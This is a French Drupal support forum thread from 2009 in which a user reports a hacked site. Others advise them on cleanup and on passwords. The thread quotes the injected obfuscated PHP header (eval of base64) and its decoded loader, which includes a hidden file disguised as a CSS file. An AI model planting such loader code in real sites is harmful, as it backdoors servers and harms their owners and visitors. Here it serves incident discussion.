Site drupal piraté...

Information importante

En raison d'un grand nombre d'inscriptions de spammers sur notre site, polluant sans relache notre forum, nous suspendons la création de compte via le formulaire de "sign up".

Il est néanmoins toujours possible de devenir adhérent•e en faisant la demande sur cette page, rubrique "Inscription" : https://www.drupal.fr/contact


De plus, le forum est désormais "interdit en écriture". Il n'est plus autorisé d'y écrire un sujet/billet/commentaire.

Pour contacter la communauté, merci de rejoindre le slack "drupalfrance".

Si vous voulez contacter le bureau de l'association, utilisez le formulaire disponible ici, ou envoyez-nous un DM sur twitter.

Submitted by sikko on

Salut all,

Bon voilà en fouillant dans mon page.tpl.php j'ai trouvé quelques lignes en en-tête qui m'ont semblé étranges... (je l'ai tronqué pour que ça rentre dans la page...)

<?php /**/eval(base64_decode('aWYo9pcmxPQ7aW5jbHVkZ V9vbmNlKCRHTkzLzcvZDIzODQ5OTM5Mi9odGRvY3MvdjIvc2l0ZXMvYWxsL3RoZW50L3BsdWdpbZz0pO2l MvbGluay1pY29ucy9pY29u9CQUxTWZGdvYmgnKSl7b2 Jfc3RhcnQoJ2Rnb2JoJyk7ydtZnNuJ109Jy9rdW5kcy9zdHlsZS5jFMU1snbWygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnfX19')); ?>

J'ai biensur tenté de le décoder ce qui m'a donné:

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/7/moncompte1and1/htdocs/v2/sites/all/themes/monthemeperso/css/blueprint/plugins/link-icons/icons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Le script a apparemment été chercher le dossier le plus lointain de mon arborescence pour y planquer des fichiers...

Dans le fameux style.css.php référencé dans le bout de code ci-dessus, il y encore une suite de eval(base64_encode(blabla...)) qui quand je veux la decrypter m'affiche encore une suite de eval(base64()) etc. Je ne peux pas, contrairement aux premières lignes le décrypter à la main (le fichier fait 180ko)

Donc voilà, mon site drupal a été infecté, je n'ai pas vu les effets que cela avait entrainé...
Apparemment le pirate connait drupal car page.tpl.php est le seul .tpl qui est exécuté à chaque fois...

Heureusement pour moi ce n'est qu'une version en construction donc pas vraiment de répercutions. mais bon... c'est qunad même pas mal de boulot qui vient d'être "sali".

le pirate m'a créé plein de fichiers... je pourrais les supprimer mais j'attends... peut être que je parviendrai à trouver d'où ça vient...
J'utilisais drupal 6.x (je ne sais plus exactement quelle version, mais j'ai fait toutes les mises à jour vers 6.15 avant de me rendre compte m'être fait piraté...) et des modules connus comme cck ou views que j'ai également mis à jour.

Connaissez vous ce genre d'attaque? à part écrire dans mes fichiers, qu'a pu faire le pirate ? que dois-je faire exactement ? dois-je changer de mot de passe de bdd ?
La faille de drupal que le pirate a emprunté est elle connue ?

Bref merci d'avance pour votre aide...

Forum : 
Support général
Version de Drupal : 
6.x

Soumis par Yoran le 31 Décembre, 2009 - 03:09

Pour que le pirate ait pu modifier un fichier local à ton serveur, il a du y avoir plus qu'une simple faille de drupal. Tout est possible cependant mais un bon moyen d'en être certain est de vérifier les droits sur le fichiers page.tpl.php. S'il est en lecture simple sur l'utilisateur apache (ce qu'il doit être si l'installation a été bien faite), Apache, PHP, et donc Drupal n'aura pas pu le modifier directement. Cela indiquerait donc une attaque soit plus profonde (piratage d'un compte FTP ou SSH, exploit shell sur apache puis escalade root, etc. ).

Donc il me semble sage de considérer que ta machine est purement et simplement compromise et que tu ne peux pas deviner jusqu'où cela va. Cela implique un formatage complet du serveur, une reinstallation from scratch avec changement de tous les mots de passes (et pas seulement de la base ;-). C'est le seul et unique moyen d'être certain que ta machine ne soit pas potentiellement un zombie.

My two cents opinion.

Soumis par Crayulayon le 31 Décembre, 2009 - 12:37

Ça pourrait être une attaque par hidden iframe qui pointe sur une url malveillante. http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ Faudrait que tu regardes le code source HTML généré de ton site

Et oué, change tes mots de passe FTP/SSH et surtout nettoie bien ta machine avec un bon antivirus.

Utilises-tu CuteFTP en version piratée :-) ?

Soumis par Yoran le 31 Décembre, 2009 - 13:01

Ben le plus simple est de ne pas se poser de question et d'écraser les sources avec la version de développement. Sérieusement, il n'y a aucun moyen valable d'être certain à 100% d'avoir trouvé toutes les infections. Surtout si le piratage a été fait bas niveaux et qu'un rootkit a été installé sur la bécane.

Après chacun fait ce qu'il veut, mais moi, je formaterais.

Soumis par sikko le 31 Décembre, 2009 - 13:05

je ne l'avais pas précisé mais je suis en mutialisé (pack perso initial - le moins cher - chez 1and1...) donc pas moyen de formater ou quoi que ce soit...

pour les permissions je viens de regarder... tous les fichiers sont en adfrw (0644) et les répertoires en flcdmpe (0755) (bizarre...) et je m'aperçois aussi que l'infection ne s'étend pas seulement au répertoire thèmes mais que même mon fichier index de drupal a été infecté par un en-tête eval(base64...)) le fichier cron, le fichier update.php etc. pratiquement tous les fichiers...

Edit: c'est plus grave que ça en fait... le "virus" s'étend même dans le répertoire principal de mon site (la v1) qui lui est en production...
Je pense qu'il a du s'introduire par là pour se propager aux répertoires drupal qui sont des sous répertoires...

je vais devoir faire le ménage...

Je laisse quand même le topic ouvert au cas ou...